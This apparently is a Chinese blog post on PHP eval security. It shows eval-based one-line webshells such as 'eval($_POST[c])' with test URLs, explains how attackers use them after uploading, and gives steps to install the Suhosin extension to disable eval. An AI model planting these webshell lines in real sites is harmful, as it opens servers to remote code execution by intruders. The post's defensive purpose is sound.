php安全 eval的禁止 原創

2021-09-10 02:19:43 字數 3302 閱讀 8900

前段時間,**遭受了黑客的入侵,後來在排查中發現了乙個php,裡面的內容只有很少:

然後網上搜尋一下php的eval函式,發現這個eval函式帶有很大的安全隱患。

本地測試一下,在本地環境寫乙個php,內容如下:

default.php:

<?php  eval($_get[asda]);?>

然後訪問一下:localhost/test/default.php?asda=phpinfo();

就可以看到已經把phpinfo給執行了。

或者是訪問localhost/test/default.php?asda = echo 11111;同樣也會發現1111被echo出來了。

類似的手段還有:

<?php  $code="$}";?>

訪問localhost/test/default.php?c=phpinfo();即可看到

<?php

$code=addslashes($_get[c]);

eval(""$code""); 

?> 

訪問localhost/test/default.php?c=

$};即可看到

利用可以執行php的eval函式,黑客可以用這個來上傳一些後台木馬,比如說上傳php,然後通過url訪問這個php來獲得更大的許可權。這種稱為一句話木馬的入侵。比如說:寫乙個html,內容如下:

然後寫乙個default.php,內容為:
<?php  eval($_post[c]);?>

這樣的話,想執行什麼php就可以直接提交執行即可。

所以:eval()對於php安全來說具有很大的殺傷力,eval函式減弱了你的應用的安全性,因此一般不用的情況下為了防止類似如下的一句話木馬入侵,需要禁止!

然而網上很多說使用disable_functions禁止掉eval的方法都是錯誤的!

其實eval()是無法用php.ini中的disable_functions禁止掉的 :

because eval() is a language construct and not a function

eval是zend的,因此不是php_function 函式;

那麼php怎麼禁止eval呢?

如果想禁掉eval可以用php的擴充套件 suhosin:

安裝suhosin後在php.ini中load進來suhosin.so,再加上suhosin.executor.disable_eval = on即可!

總結,php的eval函式在php中是無法禁用的,因此我們也只有使用外掛程式了!

至於安裝suhosin來禁止eval函式的步驟為:(未測試)

注意:只能用於cent os

說明:php安裝目錄:/usr/local/php5

php.ini配置檔案路徑:/usr/local/php5/etc/php.ini

nginx安裝目錄:/usr/local/nginx

nginx**根目錄:/usr/local/nginx/html

1、安裝編譯工具

yum install wget  make gcc gcc-c++ zlib-devel openssl openssl-devel pcre-devel kernel keyutils  patch perl

2、安裝suhosin

cd /usr/local/src  

#進入軟體包存放目錄

wget 

tar zxvf suhosin-0.9.33.tgz  

#解壓cd suhosin-0.9.33  

#進入安裝目錄

/usr/local/php5/bin/phpize  

#用phpize生成configure配置檔案

./configure  --with-php-config=/usr/local/php5/bin/php-config 

#配置make  

#編譯make install  

#安裝安裝完成之後,出現下面的介面,記住以下路徑,後面會用到。

installing shared extensions: /usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/  

#suhosin模組路徑

3、配置php支援suhosin

vi /usr/local/php5/etc/php.ini  

#編輯配置檔案,在最後一行新增以下內容

extension=/usr/local/php5/lib/php/extensions/no-debug-non-zts-20090626/suhosin.so

suhosin.executor.disable_eval = on 

注意:suhosin.executor.disable_eval = on 的作用就是禁用eval函式

4、測試

vi /usr/local/nginx/html/phpinfo.php 

#編輯<?php

phpinfo();

?>

:wq! 

#儲存退出

service php-fpm restart  

#重啟php-fpm

service nginx restart  

#重啟nginx

注意:如果是apache的話也是一樣的,重啟apache即可。

瀏覽器開啟phpinfo.php 如下圖所示,可以看到suhosin相關資訊

至此,linux下php安裝suhosin安裝完成!

注意:禁用了 eval後,會有啥後果呢? 首先是**裡使用 eval 的軟體將不能使用比如大名鼎鼎的 discuz! 論壇和 phpwind論壇將不能正常使用,也影響到phpmyadmin的舊版本,如果更新到目前最新的3.2.5,就可以使用,只是預設有個警告的提示,在 config.inc.php 中加上 $cfg['suhosindisablewarning']=true; 

就可以取消這個警告了。

注意:除了eval之外,還有assert也是類似的用法。

posted @

2016-05-12 22:01

newman·li 閱讀(

...)

編輯收藏

php安全 eval的禁止 原創

前段時間,遭受了黑客的入侵,後來在排查中發現了乙個php,裡面的內容只有很少 然後網上搜尋一下php的eval函式,發現這個eval函式帶有很大的安全隱患。本地測試一下,在本地環境寫乙個php,內容如下 default.php 然後訪問一下 localhost test default.php?as...

php的eval的替代函式有哪些?

php的eval的替代函式 要知道php eval 函式的代替函式有哪些,首先需要知道eval函式是幹嘛的。evel 函式的作用 eval 函式把字串按照 php 來計算。該字串必須是合法的 php 且必須以分號結尾。注釋 return 語句會立即終止對字串的計算。提示 該函式對於在資料庫文字欄位中...

windowsXP的簡單安全設定 原創

一 內部 初始安裝時盡量用c d e以外的字母做碟符 例如 f g h 這樣最基本的一點可以減少郵件的攻擊。有些郵件中含有惡意 可以共享你的c d e盤,而設為f g h被共享的機率就會小一些 使用 分割槽格式進行分割槽 這個不用多說了吧 新增乙個合法使用者,盡量不使用管理員賬號登陸。這裡告訴大家乙...